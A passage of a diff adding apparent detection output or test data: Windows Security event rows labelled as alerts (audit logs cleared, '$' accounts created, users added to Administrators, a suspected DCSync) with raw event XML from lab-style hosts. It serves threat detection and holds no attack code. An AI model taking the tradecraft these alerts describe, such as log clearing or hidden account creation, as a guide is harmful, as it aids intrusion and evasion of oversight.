+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:07.251285Z"">
+    </TimeCreated>
+    <EventRecordID>2988521</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""604"" ThreadID=""3848"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1105</SubjectUserSid>
+      <SubjectUserName>jbrown</SubjectUserName>
+      <SubjectDomainName>3B</SubjectDomainName>
+      <SubjectLogonId>0x1717b6</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+User Created through management interface,1600248733.647851,2020-09-16T13:32:13.647851+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4720</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>13824</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-16T09:32:13.647155Z"">
+    </TimeCreated>
+    <EventRecordID>769634</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""TargetUserName"">$</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetSid"">S-1-5-21-308926384-506822093-3341789130-107104</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""SubjectDomainName"">3B</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""PrivilegeList"">-</Data>
+    <Data Name=""SamAccountName"">$</Data>
+    <Data Name=""DisplayName"">%%1793</Data>
+    <Data Name=""UserPrincipalName"">-</Data>
+    <Data Name=""HomeDirectory"">%%1793</Data>
+    <Data Name=""HomePath"">%%1793</Data>
+    <Data Name=""ScriptPath"">%%1793</Data>
+    <Data Name=""ProfilePath"">%%1793</Data>
+    <Data Name=""UserWorkstations"">%%1793</Data>
+    <Data Name=""PasswordLastSet"">%%1794</Data>
+    <Data Name=""AccountExpires"">%%1794</Data>
+    <Data Name=""PrimaryGroupId"">513</Data>
+    <Data Name=""AllowedToDelegateTo"">-</Data>
+    <Data Name=""OldUacValue"">0x0</Data>
+    <Data Name=""NewUacValue"">0x15</Data>
+    <Data Name=""UserAccountControl""> 
+		%%2080 
+		%%2082 
+		%%2084</Data>
+    <Data Name=""UserParameters"">%%1792</Data>
+    <Data Name=""SidHistory"">-</Data>
+    <Data Name=""LogonHours"">%%1793</Data>
+  </EventData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+User Created through management interface,1600248679.134161,2020-09-16T13:31:19.134161+04:00,,Audit,Medium,User Name ( 01566S-WIN16-IR$ ) Created User Name ( $ ),4720,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4720</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>13824</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-16T09:31:19.133272Z"">
+    </TimeCreated>
+    <EventRecordID>769629</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""752"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""TargetUserName"">$</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetSid"">S-1-5-21-308926384-506822093-3341789130-107103</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""SubjectDomainName"">3B</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""PrivilegeList"">-</Data>
+    <Data Name=""SamAccountName"">$</Data>
+    <Data Name=""DisplayName"">%%1793</Data>
+    <Data Name=""UserPrincipalName"">-</Data>
+    <Data Name=""HomeDirectory"">%%1793</Data>
+    <Data Name=""HomePath"">%%1793</Data>
+    <Data Name=""ScriptPath"">%%1793</Data>
+    <Data Name=""ProfilePath"">%%1793</Data>
+    <Data Name=""UserWorkstations"">%%1793</Data>
+    <Data Name=""PasswordLastSet"">%%1794</Data>
+    <Data Name=""AccountExpires"">%%1794</Data>
+    <Data Name=""PrimaryGroupId"">513</Data>
+    <Data Name=""AllowedToDelegateTo"">-</Data>
+    <Data Name=""OldUacValue"">0x0</Data>
+    <Data Name=""NewUacValue"">0x15</Data>
+    <Data Name=""UserAccountControl""> 
+		%%2080 
+		%%2082 
+		%%2084</Data>
+    <Data Name=""UserParameters"">%%1792</Data>
+    <Data Name=""SidHistory"">-</Data>
+    <Data Name=""LogonHours"">%%1793</Data>
+  </EventData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+schedule task updated,1553516620.16764,2019-03-25T16:23:40.167640+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4702</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12804</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T12:22:45.317605Z"">
+    </TimeCreated>
+    <EventRecordID>198238969</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""3616"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">DC1$</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
+    <Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; 
+&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt; 
+  &lt;RegistrationInfo&gt; 
+    &lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt; 
+    &lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt; 
+    &lt;Version&gt;1.0&lt;/Version&gt; 
+    &lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt; 
+    &lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt; 
+    &lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt; 
+  &lt;/RegistrationInfo&gt; 
+  &lt;Triggers&gt; 
+    &lt;CalendarTrigger&gt; 
+      &lt;StartBoundary&gt;2019-03-26T12:21:45Z&lt;/StartBoundary&gt; 
+      &lt;Enabled&gt;true&lt;/Enabled&gt; 
+      &lt;ScheduleByDay&gt; 
+        &lt;DaysInterval&gt;1&lt;/DaysInterval&gt; 
+      &lt;/ScheduleByDay&gt; 
+    &lt;/CalendarTrigger&gt; 
+  &lt;/Triggers&gt; 
+  &lt;Principals&gt; 
+    &lt;Principal id=&quot;NetworkService&quot;&gt; 
+      &lt;UserId&gt;S-1-5-20&lt;/UserId&gt; 
+      &lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt; 
+    &lt;/Principal&gt; 
+  &lt;/Principals&gt; 
+  &lt;Settings&gt; 
+    &lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt; 
+    &lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt; 
+    &lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt; 
+    &lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt; 
+    &lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt; 
+    &lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt; 
+    &lt;IdleSettings&gt; 
+      &lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt; 
+      &lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt; 
+    &lt;/IdleSettings&gt; 
+    &lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt; 
+    &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;Hidden&gt;true&lt;/Hidden&gt; 
+    &lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt; 
+    &lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt; 
+    &lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt; 
+    &lt;WakeToRun&gt;false&lt;/WakeToRun&gt; 
+    &lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt; 
+    &lt;Priority&gt;7&lt;/Priority&gt; 
+    &lt;RestartOnFailure&gt; 
+      &lt;Interval&gt;PT1M&lt;/Interval&gt; 
+      &lt;Count&gt;3&lt;/Count&gt; 
+    &lt;/RestartOnFailure&gt; 
+  &lt;/Settings&gt; 
+  &lt;Actions Context=&quot;NetworkService&quot;&gt; 
+    &lt;ComHandler&gt; 
+      &lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt; 
+      &lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt; 
+    &lt;/ComHandler&gt; 
+  &lt;/Actions&gt; 
+&lt;/Task&gt;</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+schedule task updated,1553514820.047682,2019-03-25T15:53:40.047682+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4702</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12804</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T11:52:45.143617Z"">
+    </TimeCreated>
+    <EventRecordID>198238774</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""4024"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">DC1$</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
+    <Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; 
+&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt; 
+  &lt;RegistrationInfo&gt; 
+    &lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt; 
+    &lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt; 
+    &lt;Version&gt;1.0&lt;/Version&gt; 
+    &lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt; 
+    &lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt; 
+    &lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt; 
+  &lt;/RegistrationInfo&gt; 
+  &lt;Triggers&gt; 
+    &lt;CalendarTrigger&gt; 
+      &lt;StartBoundary&gt;2019-03-26T11:51:45Z&lt;/StartBoundary&gt; 
+      &lt;Enabled&gt;true&lt;/Enabled&gt; 
+      &lt;ScheduleByDay&gt; 
+        &lt;DaysInterval&gt;1&lt;/DaysInterval&gt; 
+      &lt;/ScheduleByDay&gt; 
+    &lt;/CalendarTrigger&gt; 
+  &lt;/Triggers&gt; 
+  &lt;Principals&gt; 
+    &lt;Principal id=&quot;NetworkService&quot;&gt; 
+      &lt;UserId&gt;S-1-5-20&lt;/UserId&gt; 
+      &lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt; 
+    &lt;/Principal&gt; 
+  &lt;/Principals&gt; 
+  &lt;Settings&gt; 
+    &lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt; 
+    &lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt; 
+    &lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt; 
+    &lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt; 
+    &lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt; 
+    &lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt; 
+    &lt;IdleSettings&gt; 
+      &lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt; 
+      &lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt; 
+    &lt;/IdleSettings&gt; 
+    &lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt; 
+    &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;Hidden&gt;true&lt;/Hidden&gt; 
+    &lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt; 
+    &lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt; 
+    &lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt; 
+    &lt;WakeToRun&gt;false&lt;/WakeToRun&gt; 
+    &lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt; 
+    &lt;Priority&gt;7&lt;/Priority&gt; 
+    &lt;RestartOnFailure&gt; 
+      &lt;Interval&gt;PT1M&lt;/Interval&gt; 
+      &lt;Count&gt;3&lt;/Count&gt; 
+    &lt;/RestartOnFailure&gt; 
+  &lt;/Settings&gt; 
+  &lt;Actions Context=&quot;NetworkService&quot;&gt; 
+    &lt;ComHandler&gt; 
+      &lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt; 
+      &lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt; 
+    &lt;/ComHandler&gt; 
+  &lt;/Actions&gt; 
+&lt;/Task&gt;</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+schedule task updated,1553513019.936605,2019-03-25T15:23:39.936605+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4702</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12804</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T11:22:45.080609Z"">
+    </TimeCreated>
+    <EventRecordID>198238563</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">DC1$</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
+    <Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; 
+&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt; 
+  &lt;RegistrationInfo&gt; 
+    &lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt; 
+    &lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt; 
+    &lt;Version&gt;1.0&lt;/Version&gt; 
+    &lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt; 
+    &lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt; 
+    &lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt; 
+  &lt;/RegistrationInfo&gt; 
+  &lt;Triggers&gt; 
+    &lt;CalendarTrigger&gt; 
+      &lt;StartBoundary&gt;2019-03-26T11:21:44Z&lt;/StartBoundary&gt; 
+      &lt;Enabled&gt;true&lt;/Enabled&gt; 
+      &lt;ScheduleByDay&gt; 
+        &lt;DaysInterval&gt;1&lt;/DaysInterval&gt; 
+      &lt;/ScheduleByDay&gt; 
+    &lt;/CalendarTrigger&gt; 
+  &lt;/Triggers&gt; 
+  &lt;Principals&gt; 
+    &lt;Principal id=&quot;NetworkService&quot;&gt; 
+      &lt;UserId&gt;S-1-5-20&lt;/UserId&gt; 
+      &lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt; 
+    &lt;/Principal&gt; 
+  &lt;/Principals&gt; 
+  &lt;Settings&gt; 
+    &lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt; 
+    &lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt; 
+    &lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt; 
+    &lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt; 
+    &lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt; 
+    &lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt; 
+    &lt;IdleSettings&gt; 
+      &lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt; 
+      &lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt; 
+    &lt;/IdleSettings&gt; 
+    &lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt; 
+    &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;Hidden&gt;true&lt;/Hidden&gt; 
+    &lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt; 
+    &lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt; 
+    &lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt; 
+    &lt;WakeToRun&gt;false&lt;/WakeToRun&gt; 
+    &lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt; 
+    &lt;Priority&gt;7&lt;/Priority&gt; 
+    &lt;RestartOnFailure&gt; 
+      &lt;Interval&gt;PT1M&lt;/Interval&gt; 
+      &lt;Count&gt;3&lt;/Count&gt; 
+    &lt;/RestartOnFailure&gt; 
+  &lt;/Settings&gt; 
+  &lt;Actions Context=&quot;NetworkService&quot;&gt; 
+    &lt;ComHandler&gt; 
+      &lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt; 
+      &lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt; 
+    &lt;/ComHandler&gt; 
+  &lt;/Actions&gt; 
+&lt;/Task&gt;</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1600879816.697344,2020-09-23T20:50:16.697344+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:49:41.578692Z"">
+    </TimeCreated>
+    <EventRecordID>772605</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5424"" ThreadID=""5816"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-500</SubjectUserSid>
+      <SubjectUserName>Administrator</SubjectUserName>
+      <SubjectDomainName>3B</SubjectDomainName>
+      <SubjectLogonId>0x7b186</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+User added to local group,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-20 ) to local group ( Administrators ),4732,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4732</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>13826</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-09-22T11:23:19.251925Z"">
+    </TimeCreated>
+    <EventRecordID>191030</EventRecordID>
+    <Correlation ActivityID=""15957A0B-7182-0000-A07A-95158271D501"">
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""5108"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""MemberName"">-</Data>
+    <Data Name=""MemberSid"">S-1-5-20</Data>
+    <Data Name=""TargetUserName"">Administrators</Data>
+    <Data Name=""TargetDomainName"">Builtin</Data>
+    <Data Name=""TargetSid"">S-1-5-32-544</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x27a10f</Data>
+    <Data Name=""PrivilegeList"">-</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Security
+User added to local group,1569151399.251925,2019-09-22T15:23:19.251925+04:00,,Audit,High,User ( IEUser ) added User ( S-1-5-21-3461203602-4096304019-2269080069-501 ) to local group ( Administrators ),4732,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4732</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>13826</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-09-22T11:22:05.201727Z"">
+    </TimeCreated>
+    <EventRecordID>191029</EventRecordID>
+    <Correlation ActivityID=""15957A0B-7182-0000-A07A-95158271D501"">
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4452"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""MemberName"">-</Data>
+    <Data Name=""MemberSid"">S-1-5-21-3461203602-4096304019-2269080069-501</Data>
+    <Data Name=""TargetUserName"">Administrators</Data>
+    <Data Name=""TargetDomainName"">Builtin</Data>
+    <Data Name=""TargetSid"">S-1-5-32-544</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x27a10f</Data>
+    <Data Name=""PrivilegeList"">-</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Security
+Dcsync Attack detected,1557284437.586173,2019-05-08T07:00:37.586173+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4662</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14080</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-08T03:00:37.583261Z"">
+    </TimeCreated>
+    <EventRecordID>203056</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""4980"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
+    <Data Name=""SubjectUserName"">Administrator</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x418a6fb</Data>
+    <Data Name=""ObjectServer"">DS</Data>
+    <Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
+    <Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
+    <Data Name=""OperationType"">Object Access</Data>
+    <Data Name=""HandleId"">0x0</Data>
+    <Data Name=""AccessList"">%%7688 
+				</Data>
+    <Data Name=""AccessMask"">0x100</Data>
+    <Data Name=""Properties"">%%7688 
+		{9923a32a-3607-11d2-b9be-0000f87a36b2} 
+	{19195a5b-6da0-11d0-afd3-00c04fd930c9} 
+</Data>
+    <Data Name=""AdditionalInfo"">-</Data>
+    <Data Name=""AdditionalInfo2""></Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1557284425.304206,2019-05-08T07:00:25.304206+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-08T03:00:11.778188Z"">
+    </TimeCreated>
+    <EventRecordID>203050</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""744"" ThreadID=""768"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
